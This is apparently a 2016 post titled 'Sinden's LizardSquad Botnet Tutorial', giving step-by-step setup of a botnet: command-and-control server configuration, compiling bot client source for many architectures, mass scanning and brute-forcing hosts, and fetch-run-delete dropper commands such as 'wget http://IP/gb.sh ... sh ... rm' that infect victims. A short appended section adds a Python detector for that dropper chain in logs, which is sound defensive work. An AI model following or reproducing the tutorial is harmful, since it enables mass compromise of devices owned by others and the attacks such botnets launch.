Wednesday, August 10, 2016

P2P Botnet Files and Sales

11:31 AM
..:: Sinden's LizardSquad Botnet Tutorial ::..

LIST OF COMMANDS: http://pastebin.com/raw.php?i=kiVSGX2u

• Introduction:
Hello my name is Sinden. I'm currently thinking about quitting from this community so felt obliged to
leak this very nice protocol w/ tutorial. Please show your support and appreciation and comment below!

• What You Will Need:
- 2 x Virtual Private Servers
* [At least 4GB RAM] [Centos 6 Or Below Is Recommended!]
- My Custom Files
* [Server.c "http://hastebin.com/raw/ogifodejub"; client.c "http://hastebin.com/raw/evuquwakon"]
- Custom LRAB Scanner
* "https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip"
- Dedicated Scanning Server
* [Any Server That Is Capable Of Mass TCP Scanning]

TIP: Good Server Hosts:
!* - Ecatel - http://www.Ecatel.info
!* - VPSDime - http://www.VPSDime.com
!* - HudsonValleyHost.com - http://www.HudsonValleyHost.com
!* - LeaseWeb - http://www.LeaseWeb.com/

• Getting Your Server Ready:
!* - First you will need to install all the dependencies and repositories on your hosting server to run everything as smooth as possible

1. [Centos] - Run this command *NOTE Run this on both your servers!
Command: "wget http://pastebin.com/raw.php?i=Nd1PkEz0 -O update; chmod 777 update; sh update"

!* - Once this has completed you are going to have to configure your botnet server. *Note If you're running any other distro edit the update file to apt-get.

2. Run "wget http://hastebin.com/raw/ogifodejub -O server.c; nano server.c" and edit this part
Code:
//Admin-Config
#define MY_MGM_ADMINP "Password"
#define MY_MGM_ADMINU "User"
#define MY_MGM_MATENP "Password"
#define MY_MGM_MATENU "User"
#define MY_MGM_USERP "Password"
#define MY_MGM_USERU "User"
#define MY_MGM_GUESTP "Password"
#define MY_MGM_GUESTU "User"
#define MY_MGM_PORT 6969
This is the login and port settings for the botnet protocol. Edit the four clients that look like this "Password" "User".

!* - Once you have edited the file exit and save all changes.

3. Run "gcc -o server server.c -pthread; screen ./server 164 1000" and then once the screen process hold CTRL + A and press D.

!* - That command has disconnected you from the server screen process but will still always be running in the background.

4. Run "yum install nc -y --skip-broken" or "yum install netcat -y --skip-broken"

5. Run "nc localhost 6969"

!* - This should prompt you with a login screen. Use the credentials that you edited in the file.

6. Press CTRL + C to exit and open your secondary server.

!* - This secondary server is your Apache host for your binaries.

7. Run "service httpd start" then "cd /var/www/html"

8. Run "wget http://hastebin.com/raw/digeqiwoya -O arch-wget; sh arch-wget; rm -rf arch-wget"

9. Run "wget http://hastebin.com/raw/evuquwakon -O client.c; nano client.c"

!* - Now this is where you need to pay attention and read carefully.

!* - Find this part in the client.c
Code:
// ___ __ _
// / __\___ _ __ / _(_) __ _
// / / / _ \| '_ \| |_| |/ _` |
// / /__| (_) | | | | _| | (_| |
// \____/\___/|_| |_|_| |_|\__, |
// |___/

unsigned char *commServer[] =
{
"IP:PORT" //Start the server on this port
};


10. Edit the IP to your botnet server host and your port to "164"

!* - Find this part of the code on line 990
Code:
if(send(fds[i].fd, "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n", 79, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }

11. Edit the IP in the wget to the server that's hosting your binaries and change all the file names to what you want your file name to be *NOTE Must end with .sh

!* - Now you need to change the character count and that's this part in that line of code
Code:
79, MSG_NOSIGNAL)

!* - You need to open a code editor e.g Notepad++ or Sublime text that shows character count.

e.g "wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh\r\n" the character count is 72 *Note Remember "\r\n" you only count the letters not "\".

!* - Once you have edited that file exit and save.

12. Run "wget http://hastebin.com/raw/momuromite -O comp; sh comp client.c"

!* - This will automatically compile your bot to all 12 architectures.

13. On the Apache host server run "wget http://hastebin.com/raw/momuromite -O gb.sh" *NOTE change the name of the file according to what you named it in client.c

14. Run "nano gb.sh" and edit all the parts with the part "IP" to the IP that's hosting your binaries

!* - Check the Apache host IP on your browser like ip/gb.sh to check if the file downloads

..:: END OF BOTNET SETUP... CONTINUE TO LEARN HOW TO ADD BOTS ::..


!* - Login into your scanning server

1. Run "yum install unzip -y --skip-broken"

2. Run "cd /var/opt; mkdir .scan; cd .scan; wget https://www.dropbox.com/s/xvvrzx0u3jer6jx/LRAB.zip; unzip LRAB.zip; cd LRAB"

3. Run "wget http://pastebin.com/raw.php?i=AwEqTNTA -O wget.pl; nano wget.pl"

!* - Find this line
Code:
$channel->exec('wget http://IP/gb.sh -O /tmp/ gb.sh; sh /tmp/ gb.sh; rm /tmp/ gb.sh');

4. Edit the IP and file name to your binary host IP and .sh file name and save and exit.

5. Run "wget http://pastebin.com/raw.php?i=enUdaRrk -O mass"

6. Run "nano mass" and only edit the ranges except if your interface isn't eth0. *Note You have a complete choice on what ranges you want to scan.

7. Run "screen sh mass" and then hold CTRL+A and press D to detach from screen.

!* - Once the scan is done it will automatically start to bruteforce.

*NOTE: To check if the scan is done run "ps -A | grep class" and to check if the bruteforce is still running "ps -A | grep update"

8. To finally add the bots to your net run the finished vuln by typing "perl wget.pl vuln.txt"
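
Defender's note, added here and not part of the original post: the fetch, run and delete one-liner that appears in the client.c send() call and in wget.pl is a stable behavioural signature for hosts receiving this kit. The Python below flags that chain in logged command lines, and goes beyond the exact string on the page by also accepting curl and `&&` separators; the log format, field names and addresses are constructed for the example.

```python
import re

FETCHERS = {"wget", "curl"}
SHELLS = {"sh", "bash", "ash", "dash"}
OUT_FLAGS = {"-O", "-o", "--output", "--output-document"}

# Constructed sample lines (hypothetical log format, documentation-range addresses).
SAMPLE_LOG = [
    'ts=2016-08-10T11:31:02Z src=203.0.113.50 user=root '
    'cmd="wget http://198.51.100.7/gb.sh -O /tmp/gb.sh; sh /tmp/gb.sh; rm /tmp/gb.sh"',
    'ts=2016-08-10T11:40:10Z src=192.0.2.10 user=deploy '
    'cmd="wget https://example.org/tool.tgz -O /tmp/tool.tgz; tar -xzf /tmp/tool.tgz"',
    'ts=2016-08-10T11:52:44Z src=203.0.113.51 user=admin '
    'cmd="cd /tmp && curl -o x.sh http://198.51.100.7/x.sh && bash x.sh; rm -rf x.sh"',
]

def find_dropper(cmdline):
    """Return (url, path) when one file is fetched, run by a shell, then deleted."""
    fetched, ran = {}, set()  # local path -> URL; fetched paths given to a shell
    for part in re.split(r";|&&|\|\|", cmdline):  # stages of the one-liner
        tokens = part.split() or [""]  # an empty stage matches nothing below
        prog, args = tokens[0].rsplit("/", 1)[-1], tokens[1:]
        if prog in FETCHERS:
            url = next((a for a in args if re.match(r"(?i)(https?|ftp)://", a)), None)
            out = next((b for a, b in zip(args, args[1:]) if a in OUT_FLAGS), None)
            if url:  # with no output flag, wget saves under the URL's basename
                fetched[out or url.rstrip("/").rsplit("/", 1)[-1]] = url
        elif prog in SHELLS:
            ran.update(a for a in args if a in fetched)
        elif prog == "rm":
            for a in args:
                if a in ran:
                    return fetched[a], a
    return None

def scan(lines):
    """Return (source address, url, path) for each log line holding the chain."""
    hits = []
    for line in lines:
        m = re.search(r'src=(\S+).*?cmd="(.*)"\s*$', line)
        hit = find_dropper(m.group(2)) if m else None
        if hit:
            hits.append((m.group(1),) + hit)
    return hits

if __name__ == "__main__":
    for src, url, path in scan(SAMPLE_LOG):
        print(f"dropper chain from {src}: {url} -> {path}")
```

The check keys on ordering (a fetched path is passed to a shell and then removed), so a plain download followed by tar, as in the second sample line, is not flagged.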
